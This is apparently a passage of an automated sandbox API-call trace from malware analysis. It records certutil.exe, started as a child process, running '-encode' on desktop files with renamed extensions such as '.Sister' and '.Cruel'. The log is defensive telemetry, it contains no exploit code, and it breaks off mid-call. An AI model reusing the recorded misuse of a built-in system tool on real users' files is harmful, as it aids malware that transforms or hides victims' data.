0x237ce83f310 [0273.642] LocalAlloc (uFlags=0x0, uBytes=0x8e) returned 0x237ce834420 [0273.642] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="p", cchCount2=-1) returned 1 [0273.642] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="pin", cchCount2=-1) returned 1 [0273.642] SetLastError (dwErrCode=0x80070716) [0273.642] _vsnwprintf (in: _Buffer=0x9565baf7f8, _BufferCount=0xb, _Format="%d", _ArgList=0x9565baf7e8 | out: _Buffer="465") returned 3 [0273.643] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1d1, lpBuffer=0x9565baf5b0, cchBufferMax=128 | out: lpBuffer="Command Line") returned 0xc [0273.643] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x237ce8424c0 [0273.643] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0273.643] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0273.643] GetEnvironmentVariableW (in: lpName="certsrv_rawhex", lpBuffer=0x9565baf590, nSize=0x104 | out: lpBuffer="\x01") returned 0x0 [0273.643] GetLastError () returned 0xcb [0273.643] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0273.643] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0273.643] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0273.643] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0273.643] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0273.643] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0273.643] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0273.643] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0273.643] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0273.643] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0273.643] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0273.644] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0273.644] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0273.644] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0273.644] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0273.644] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0273.644] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0273.644] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0273.644] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0273.644] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0273.644] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0273.644] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Cryptography\\AutoEnrollment", ulOptions=0x0, samDesired=0x20019, phkResult=0x9565baf258 | out: phkResult=0x9565baf258*=0x23c) returned 0x0 [0273.644] LocalAlloc (uFlags=0x0, uBytes=0x5e) returned 0x237ce839170 [0273.644] RegQueryValueExW (in: hKey=0x23c, lpValueName="RawHex", lpReserved=0x0, lpType=0x9565baf7c8, lpData=0x9565baf7f8, lpcbData=0x9565baf7c0*=0x4 | out: lpType=0x9565baf7c8*=0x0, lpData=0x9565baf7f8*=0x0, lpcbData=0x9565baf7c0*=0x4) returned 0x2 [0273.644] LocalFree (hMem=0x237ce839170) returned 0x0 [0273.644] RegCloseKey (hKey=0x23c) returned 0x0 [0273.644] LocalFree (hMem=0x0) returned 0x0 [0273.644] CryptFindOIDInfo (dwKeyType=0x1, pvKey=0x7ff70ae80270, dwGroupId=0x7) returned 0x237ce85cc10 [0273.657] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount1=-1, lpString2="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount2=-1) returned 2 [0273.657] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="stdio", cchCount2=-1) returned 1 [0273.657] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="LegacyCertSelectionUI", cchCount2=-1) returned 1 [0273.657] lstrcmpW (lpString1="encode", lpString2="uSAGE") returned -1 [0273.657] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="gp", cchCount2=-1) returned 1 [0273.657] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="loc", cchCount2=-1) returned 1 [0273.658] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="ent", cchCount2=-1) returned 1 [0273.658] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="q", cchCount2=-1) returned 1 [0273.658] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dump", cchCount2=-1) returned 3 [0273.658] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dumpPFX", cchCount2=-1) returned 3 [0273.658] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="asn", cchCount2=-1) returned 3 [0273.658] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="", cchCount2=-1) returned 3 [0273.658] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decodehex", cchCount2=-1) returned 3 [0273.658] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encodehex", cchCount2=-1) returned 1 [0273.658] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decode", cchCount2=-1) returned 3 [0273.658] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encode", cchCount2=-1) returned 2 [0273.658] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x237ce861ce0 [0273.658] GetComputerNameW (in: lpBuffer=0x237ce861ce0, nSize=0x9565baf7c0 | out: lpBuffer="NQDPDE", nSize=0x9565baf7c0) returned 1 [0273.695] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x0, nSize=0x9565baf790 | out: lpBuffer=0x0, nSize=0x9565baf790) returned 0 [0273.695] GetLastError () returned 0xea [0273.695] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x237ce84b790 [0273.695] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x237ce84b790, nSize=0x9565baf790 | out: lpBuffer="NQdPdE", nSize=0x9565baf790) returned 1 [0273.695] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0273.699] CertCreateCertificateContext (dwCertEncodingType=0x1, pbCertEncoded=0x237ce861d50, cbCertEncoded=0xcb3b) returned 0x0 [0273.703] CertCreateCRLContext (dwCertEncodingType=0x1, pbCrlEncoded=0x237ce861d50, cbCrlEncoded=0xcb3b) returned 0x0 [0273.706] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x4, pbEncoded=0x237ce861d50, cbEncoded=0xcb3b, dwFlags=0x8000, pDecodePara=0x9565baf670, pvStructInfo=0x9565baf700, pcbStructInfo=0x9565baf6f4 | out: pvStructInfo=0x9565baf700, pcbStructInfo=0x9565baf6f4) returned 0 [0273.706] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x15, pbEncoded=0x237ce861d50, cbEncoded=0xcb3b, dwFlags=0x8000, pDecodePara=0x9565baf670, pvStructInfo=0x9565baf700, pcbStructInfo=0x9565baf6f4 | out: pvStructInfo=0x9565baf700, pcbStructInfo=0x9565baf6f4) returned 0 [0273.706] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x3b, pbEncoded=0x237ce861d50, cbEncoded=0xcb3b, dwFlags=0x8000, pDecodePara=0x9565baf670, pvStructInfo=0x9565baf700, pcbStructInfo=0x9565baf6f4 | out: pvStructInfo=0x9565baf700, pcbStructInfo=0x9565baf6f4) returned 0 [0273.706] CryptMsgOpenToDecode (dwMsgEncodingType=0x10001, dwFlags=0x0, dwMsgType=0x0, hCryptProv=0x0, pRecipientInfo=0x0, pStreamInfo=0x0) returned 0x237ce845660 [0273.716] CryptMsgUpdate (hCryptMsg=0x237ce845660, pbData=0x237ce861d50, cbData=0xcb3b, fFinal=1) returned 0 [0273.716] GetLastError () returned 0x8009310b [0273.717] CryptMsgClose (hCryptMsg=0x237ce845660) returned 1 [0273.717] GetFileAttributesExW (in: lpFileName="yLW8a6BSku30pNN.csv.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\ylw8a6bsku30pnn.csv.sister"), fInfoLevelId=0x0, lpFileInformation=0x9565baf720 | out: lpFileInformation=0x9565baf720*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbff840b0, ftCreationTime.dwHighDateTime=0x1d5ef44, ftLastAccessTime.dwLowDateTime=0x7ae7f5f0, ftLastAccessTime.dwHighDateTime=0x1d5e0cc, ftLastWriteTime.dwLowDateTime=0x7ae7f5f0, ftLastWriteTime.dwHighDateTime=0x1d5e0cc, nFileSizeHigh=0x0, nFileSizeLow=0xcb3b)) returned 1 [0273.717] _vsnwprintf (in: _Buffer=0x9565baf728, _BufferCount=0xb, _Format="%d", _ArgList=0x9565baf718 | out: _Buffer="359") returned 3 [0273.717] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x167, lpBuffer=0x9565baf4e0, cchBufferMax=128 | out: lpBuffer="Input Length = %d") returned 0x11 [0273.717] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x237ce861770 [0273.717] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0273.717] _vsnwprintf (in: _Buffer=0x9565bae710, _BufferCount=0x1ff, _Format="Input Length = %d", _ArgList=0x9565baf768 | out: _Buffer="Input Length = 52027") returned 20 [0273.717] GetFileType (hFile=0x50) returned 0x2 [0273.717] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x9565bae710*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0x9565bae6c4, lpReserved=0x0 | out: lpBuffer=0x9565bae710*, lpNumberOfCharsWritten=0x9565bae6c4*=0x14) returned 1 [0273.841] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0273.841] _vsnwprintf (in: _Buffer=0x9565bae710, _BufferCount=0x1ff, _Format="\n", _ArgList=0x9565baf768 | out: _Buffer="\n") returned 1 [0273.841] GetFileType (hFile=0x50) returned 0x2 [0273.841] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x9565bae710*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x9565bae6c4, lpReserved=0x0 | out: lpBuffer=0x9565bae710*, lpNumberOfCharsWritten=0x9565bae6c4*=0x1) returned 1 [0274.072] GetFileAttributesExW (in: lpFileName="yLW8a6BSku30pNN.csv.Cruel" (normalized: "c:\\users\\fd1hvy\\desktop\\ylw8a6bsku30pnn.csv.cruel"), fInfoLevelId=0x0, lpFileInformation=0x9565baf720 | out: lpFileInformation=0x9565baf720*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcde80bc6, ftCreationTime.dwHighDateTime=0x1d6141f, ftLastAccessTime.dwLowDateTime=0xcde80bc6, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xcdf28d1a, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x117ac)) returned 1 [0274.072] _vsnwprintf (in: _Buffer=0x9565baf728, _BufferCount=0xb, _Format="%d", _ArgList=0x9565baf718 | out: _Buffer="361") returned 3 [0274.072] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x169, lpBuffer=0x9565baf4e0, cchBufferMax=128 | out: lpBuffer="Output Length = %d") returned 0x12 [0274.072] LocalAlloc (uFlags=0x0, uBytes=0x26) returned 0x237ce861cb0 [0274.073] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0274.073] _vsnwprintf (in: _Buffer=0x9565bae710, _BufferCount=0x1ff, _Format="Output Length = %d", _ArgList=0x9565baf768 | out: _Buffer="Output Length = 71596") returned 21 [0274.073] GetFileType (hFile=0x50) returned 0x2 [0274.073] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x9565bae710*, nNumberOfCharsToWrite=0x15, lpNumberOfCharsWritten=0x9565bae6c4, lpReserved=0x0 | out: lpBuffer=0x9565bae710*, lpNumberOfCharsWritten=0x9565bae6c4*=0x15) returned 1 [0274.219] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0274.219] _vsnwprintf (in: _Buffer=0x9565bae710, _BufferCount=0x1ff, _Format="\n", _ArgList=0x9565baf768 | out: _Buffer="\n") returned 1 [0274.219] GetFileType (hFile=0x50) returned 0x2 [0274.219] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x9565bae710*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x9565bae6c4, lpReserved=0x0 | out: lpBuffer=0x9565bae710*, lpNumberOfCharsWritten=0x9565bae6c4*=0x1) returned 1 [0274.300] LocalFree (hMem=0x237ce861d50) returned 0x0 [0274.301] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0274.301] _vsnwprintf (in: _Buffer=0x9565baf788, _BufferCount=0xb, _Format="%d", _ArgList=0x9565baf778 | out: _Buffer="2022") returned 4 [0274.301] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x7e6, lpBuffer=0x9565baf540, cchBufferMax=128 | out: lpBuffer="%ws: -%ws command completed successfully.") returned 0x29 [0274.301] LocalAlloc (uFlags=0x0, uBytes=0x54) returned 0x237ce838c10 [0274.302] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0274.302] _vsnwprintf (in: _Buffer=0x9565bae770, _BufferCount=0x1ff, _Format="%ws: -%ws command completed successfully.", _ArgList=0x9565baf7c8 | out: _Buffer="CertUtil: -encode command completed successfully.") returned 49 [0274.302] GetFileType (hFile=0x50) returned 0x2 [0274.302] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x9565bae770*, nNumberOfCharsToWrite=0x31, lpNumberOfCharsWritten=0x9565bae724, lpReserved=0x0 | out: lpBuffer=0x9565bae770*, lpNumberOfCharsWritten=0x9565bae724*=0x31) returned 1 [0274.374] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0274.374] _vsnwprintf (in: _Buffer=0x9565bae770, _BufferCount=0x1ff, _Format="\n", _ArgList=0x9565baf7c8 | out: _Buffer="\n") returned 1 [0274.374] GetFileType (hFile=0x50) returned 0x2 [0274.375] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x9565bae770*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x9565bae724, lpReserved=0x0 | out: lpBuffer=0x9565bae770*, lpNumberOfCharsWritten=0x9565bae724*=0x1) returned 1 [0274.771] LocalFree (hMem=0x0) returned 0x0 [0274.771] LocalFree (hMem=0x237ce834420) returned 0x0 [0274.771] LocalFree (hMem=0x237ce83f310) returned 0x0 [0274.771] SetLastError (dwErrCode=0x80070716) [0274.771] _vsnwprintf (in: _Buffer=0x9565baf7f8, _BufferCount=0xb, _Format="%d", _ArgList=0x9565baf7e8 | out: _Buffer="511") returned 3 [0274.771] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1ff, lpBuffer=0x9565baf5b0, cchBufferMax=128 | out: lpBuffer="Command Succeeded") returned 0x11 [0274.771] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x237ce861650 [0274.772] PostQuitMessage (nExitCode=0) [0274.772] GetMessageW (in: lpMsg=0x9565bafdf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x9565bafdf0) returned 0 [0274.772] LocalFree (hMem=0x237ce84b790) returned 0x0 [0274.772] LocalFree (hMem=0x237ce861ce0) returned 0x0 [0274.772] LocalFree (hMem=0x0) returned 0x0 [0274.772] GetModuleHandleW (lpModuleName="certadm.dll") returned 0x0 [0274.773] GetLastError () returned 0x7e [0274.774] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0274.774] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0274.774] DllMain () returned 0x1 [0274.774] LocalFree (hMem=0x237ce84b910) returned 0x0 [0274.774] LocalFree (hMem=0x237ce8424c0) returned 0x0 [0274.774] LocalFree (hMem=0x237ce861770) returned 0x0 [0274.774] LocalFree (hMem=0x237ce861cb0) returned 0x0 [0274.774] LocalFree (hMem=0x237ce838c10) returned 0x0 [0274.774] LocalFree (hMem=0x237ce861650) returned 0x0 [0274.775] LocalFree (hMem=0x237ce844210) returned 0x0 [0274.775] LocalFree (hMem=0x237ce841e30) returned 0x0 [0274.775] GetModuleHandleW (lpModuleName="certenroll.dll") returned 0x0 [0274.775] GetLastError () returned 0x7e [0274.775] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0274.775] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0274.775] DllMain () returned 0x1 [0274.776] exit (_Code=0) Thread: id = 101 os_tid = 0x1200 Process: id = "38" image_name = "certutil.exe" filename = "c:\\windows\\system32\\certutil.exe" page_root = "0x2cafb000" os_pid = "0xfb8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x1190" cmd_line = "certutil -encode \"Z31qy U6YA31zG.bmp.Sister\" \"Z31qy U6YA31zG.bmp.Cruel\"" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 102 os_tid = 0xfbc [0276.800] GetStartupInfoW (in: lpStartupInfo=0x2935c7fe80 | out: lpStartupInfo=0x2935c7fe80*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"Z31qy U6YA31zG.bmp.Sister\" \"Z31qy U6YA31zG.bmp.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0276.801] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff70ad80000 [0276.801] __set_app_type (_Type=0x1) [0276.801] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff70ae6cd90) returned 0x0 [0276.801] __wgetmainargs (in: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8, _DoWildCard=0, _StartInfo=0x7ff70aed38b4 | out: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8) returned 0 [0276.804] _onexit (_Func=0x7ff70ae745a0) returned 0x7ff70ae745a0 [0276.804] _onexit (_Func=0x7ff70ae746c0) returned 0x7ff70ae746c0 [0276.804] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0276.804] GetProcAddress (hModule=0x7ffce9120000, lpProcName="WerSetFlags") returned 0x7ffce913a530 [0276.804] WerSetFlags () returned 0x0 [0276.805] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0276.805] __iob_func () returned 0x7ffcea2dea00 [0276.805] _fileno (_File=0x7ffcea2dea30) returned 1 [0276.805] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0276.805] _wsetlocale (category=1, locale=".OCP") returned="English_United States.437" [0276.806] _wsetlocale (category=3, locale=".OCP") returned="English_United States.437" [0276.806] _wsetlocale (category=4, locale=".OCP") returned="English_United States.437" [0276.806] _wsetlocale (category=5, locale=".OCP") returned="English_United States.437" [0276.806] GetConsoleOutputCP () returned 0x1b5 [0276.873] _vsnwprintf (in: _Buffer=0x2935c7fdf0, _BufferCount=0xb, _Format=".%d", _ArgList=0x2935c7fd18 | out: _Buffer=".437") returned 4 [0276.874] _wsetlocale (category=2, locale=".437") returned="English_United States.437" [0276.874] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0276.874] GetFileType (hFile=0x50) returned 0x2 [0276.874] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0276.874] GetProcAddress (hModule=0x7ffce9120000, lpProcName="SetThreadUILanguage") returned 0x7ffce913a990 [0276.874] SetThreadUILanguage (LangId=0x0) returned 0x409 [0276.943] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1=".exe", cchCount1=-1, lpString2=".exe", cchCount2=-1) returned 2 [0276.943] GetCommandLineW () returned="certutil -encode \"Z31qy U6YA31zG.bmp.Sister\" \"Z31qy U6YA31zG.bmp.Cruel\"" [0276.943] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x155bfdcb5e0 [0276.943] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x155bfdbce10 [0276.943] LocalFree (hMem=0x155bfdcb5e0) returned 0x0 [0276.943] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x155bfdc2040 [0276.943] LocalAlloc (uFlags=0x0, uBytes=0x22) returned 0x155bfdc21f0 [0276.943] LocalFree (hMem=0x155bfdc2040) returned 0x0 [0276.943] LocalFree (hMem=0x155bfdbce10) returned 0x0 [0276.943] LocalFree (hMem=0x0) returned 0x0 [0276.943] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0276.944] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0276.945] GetCommandLineW () returned="certutil -encode \"Z31qy U6YA31zG.bmp.Sister\" \"Z31qy U6YA31zG.bmp.Cruel\"" [0276.945] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x155bfdcb960 [0276.945] GetSystemTime (in: lpSystemTime=0x2935c7fae0 | out: lpSystemTime=0x2935c7fae0*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x12, wMinute=0x31, wSecond=0x33, wMilliseconds=0x1e5)) [0276.945] SystemTimeToFileTime (in: lpSystemTime=0x2935c7fae0, lpFileTime=0x2935c7fad8 | out: lpFileTime=0x2935c7fad8) returned 1 [0276.945] FileTimeToLocalFileTime (in: lpFileTime=0x2935c7fad8, lpLocalFileTime=0x2935c7faa0 | out: lpLocalFileTime=0x2935c7faa0) returned 1 [0276.945] FileTimeToSystemTime (in: lpFileTime=0x2935c7faa0, lpSystemTime=0x2935c7f810 | out: lpSystemTime=0x2935c7f810) returned 1 [0276.945] GetDateFormatW (in: Locale=0x400, dwFlags=0x1, lpDate=0x2935c7f810, lpFormat=0x0, lpDateStr=0x2935c7f920, cchDate=128 | out: lpDateStr="4/16/2020") returned 10 [0276.945] GetTimeFormatW (in: Locale=0x400, dwFlags=0x2, lpTime=0x2935c7f810, lpFormat=0x0, lpTimeStr=0x2935c7f820, cchTime=128 | out: lpTimeStr="8:49 PM") returned 8 [0276.945] _vsnwprintf (in: _Buffer=0x2935c7f82e, _BufferCount=0x78, _Format=" %02u.%03us", _ArgList=0x2935c7f7f8 | out: _Buffer=" 51.485s") returned 8 [0276.945] LocalAlloc (uFlags=0x0, uBytes=0x34) returned 0x155bfdce670 [0276.945] SetLastError (dwErrCode=0x80070716) [0276.945] _vsnwprintf (in: _Buffer=0x2935c7f8a8, _BufferCount=0xb, _Format="%d", _ArgList=0x2935c7f898 | out: _Buffer="948") returned 3 [0276.946] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x3b4, lpBuffer=0x2935c7f660, cchBufferMax=128 | out: lpBuffer="Begin") returned 0x5 [0276.946] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0x155bfdcb6a0 [0276.946] LocalAlloc (uFlags=0x0, uBytes=0x640) returned 0x155bfdc4070 [0276.946] LocalFree (hMem=0x155bfdce670) returned 0x0 [0276.946] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2935c7fb50 | out: lpSystemTimeAsFileTime=0x2935c7fb50*(dwLowDateTime=0xcfae8dcb, dwHighDateTime=0x1d6141f)) [0276.946] GetLocalTime (in: lpSystemTime=0x2935c7fb88 | out: lpSystemTime=0x2935c7fb88*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x14, wMinute=0x31, wSecond=0x33, wMilliseconds=0x1e7)) [0276.946] SystemTimeToFileTime (in: lpSystemTime=0x2935c7fb88, lpFileTime=0x2935c7fb60 | out: lpFileTime=0x2935c7fb60) returned 1 [0276.946] CompareFileTime (lpFileTime1=0x2935c7fb60, lpFileTime2=0x2935c7fb50) returned 1 [0276.946] _vsnwprintf (in: _Buffer=0x2935c7fb98, _BufferCount=0x13, _Format="GMT %s %.2f", _ArgList=0x2935c7fb28 | out: _Buffer="GMT + 2.00") returned 10 [0276.947] LocalFree (hMem=0x155bfdcb960) returned 0x0 [0276.947] GetModuleHandleW (lpModuleName="certca.dll") returned 0x7ffcde520000 [0276.947] FindResourceW (hModule=0x7ffcde520000, lpName=0x1, lpType=0x10) returned 0x7ffcde5e0090 [0276.947] LoadResource (hModule=0x7ffcde520000, hResInfo=0x7ffcde5e0090) returned 0x7ffcde5e00b0 [0276.947] LockResource (hResData=0x7ffcde5e00b0) returned 0x7ffcde5e00b0 [0276.947] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="VS_VERSION_INFO", cchCount1=-1, lpString2="VS_VERSION_INFO", cchCount2=-1) returned 2 [0276.947] _vsnwprintf (in: _Buffer=0x7ff70aed6890, _BufferCount=0x3f, _Format="%u.%u.%u.%u", _ArgList=0x2935c7fbc8 | out: _Buffer="10.0.15063.447") returned 14 [0276.947] GetACP () returned 0x4e4 [0276.947] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0276.947] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x155bfdcb4e0 [0276.947] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x155bfdcb4e0, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0276.947] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x155bfdce3b0 [0276.947] _vsnwprintf (in: _Buffer=0x155bfdce3b0, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x2935c7fc18 | out: _Buffer="10.0.15063.447 retail") returned 21 [0276.948] LocalFree (hMem=0x155bfdcb4e0) returned 0x0 [0276.948] LocalFree (hMem=0x0) returned 0x0 [0276.948] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0276.948] GetACP () returned 0x4e4 [0276.948] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0276.948] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x155bfdcb520 [0276.948] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x155bfdcb520, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0276.948] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x155bfdce4b0 [0276.948] _vsnwprintf (in: _Buffer=0x155bfdce4b0, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x2935c7fc18 | out: _Buffer="10.0.15063.447 retail") returned 21 [0276.948] LocalFree (hMem=0x155bfdcb520) returned 0x0 [0276.948] LocalFree (hMem=0x0) returned 0x0 [0276.948] GetACP () returned 0x4e4 [0276.948] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, 